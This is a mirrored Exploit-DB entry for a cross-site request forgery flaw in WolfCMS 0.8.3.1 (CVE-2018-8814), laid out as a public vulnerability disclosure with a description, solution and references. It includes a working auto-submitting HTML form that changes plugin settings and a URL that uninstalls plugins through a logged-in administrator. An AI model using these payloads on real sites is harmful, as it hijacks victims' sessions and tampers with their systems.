bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/exploits/php/webapps/44418.txt
Offensive Security 3339727aed DB: 2018-04-12 
2 changes to exploits/shellcodes

Cobub Razor 0.7.2 - Cross Site Request Forgery
WolfCMS 0.8.3.1 - Cross Site Request Forgery
Cobub Razor 0.7.2 - Cross-Site Request Forgery
WolfCMS 0.8.3.1 - Cross-Site Request Forgery

KYOCERA Net Admin 3.4 - Cross Site Request Forgery - Add Admin Exploit
KYOCERA Net Admin 3.4 - Cross-Site Request Forgery (Add Admin)

iScripts SonicBB 1.0 - Reflected Cross-Site Scripting
iScripts SonicBB 1.0 - Reflected Cross-Site Scripting (PoC)
Wordpress Plugin Activity Log 2.4.0 - Stored Cross Site Scripting
WUZHI CMS 4.1.0 - ‘Add Admin Account’ Cross-Site Request Forgery
WUZHI CMS 4.1.0 - ‘Add User Account’ Cross-Site Request Forgery
Wordpress Plugin Activity Log 2.4.0 - Stored Cross-Site Scripting
WUZHI CMS 4.1.0 - Cross-Site Request Forgery (Add Admin User)
WUZHI CMS 4.1.0 - Cross-Site Request Forgery (Add User)
WordPress File Upload Plugin 4.3.2 - Stored Cross Site Scripting
WordPress Plugin WordPress File Upload 4.3.3 - Stored XSS
WordPress Plugin File Upload 4.3.2 - Stored Cross-Site Scripting
WordPress Plugin File Upload 4.3.3 - Stored Cross-Site Scripting (PoC)

Linux/x64 - x64 Assembly Shellcode (Generator)
2018-04-12 05:01:47 +00:00

64 lines
No EOL
1.9 KiB
Text
Raw Blame History

#######################################
# Exploit Title: WolfCMS 0.8.3.1 Cross Site Request Forgery
# Google Dork: N/A
# Date: 04-04-2018
#######################################
# Exploit Author: Sureshbabu Narvaneni#
#######################################
# Author Blog : http://nullnews.in
# Vendor Homepage: http://www.wolfcms.org
# Software Link:
# Affected Version: 0.8.3.1
# Category: WebApps
# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
# CVE : CVE-2018-8814
#
# 1. Vendor Description:
#
# Light-weight, fast, simple and powerful CMS. PHP-based, easily extended
CMS. Uses MySQL, SQLite or (from 0.7)
# PostgreSQL for db. Simple drag & drop page hierarchy. Open source,
licensed under GPLv3.
#
# 2. Technical Description:
#
# Cross-site request forgery (CSRF) vulnerability in WolfCMS before 0.8.3.1
allows remote attackers to hijack the
# authentication of users for requests that modify
plugin/[pluginname]/settings and can uninstall plugins by sending
# malicious request.
#
# 3. Proof Of Concept:
#
# Send below request to logged in user to change the plugin settings.
#
#<html>
# <body>
# <form action="http://[URL]/wolf/wolfcms/?/admin/plugin/archive/save"
method="POST">
# <input type="hidden" name="settings&#91;use&#95;dates&#93;"
value="1" />
# <input type="hidden" name="commit" value="Save" />
# <input type="submit" value="Submit request" />
# </form>
# <script>
# document.forms[0].submit();
# </script>
# </body>
#</html>
#
# Share the below URL to uninstall any plugin remotely.
#
# http://[url]/wolfcms/?/admin/setting/uninstall_plugin/[pluginname]
#
#
# 4. Solution:
#
# Upgrade to latest release.
# http://www.wolfcms.org/blog.html
#
# 5. Reference:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8814
# https://github.com/wolfcms/wolfcms/issues/671
#####################################
Reference in a new issue View git blame Copy permalink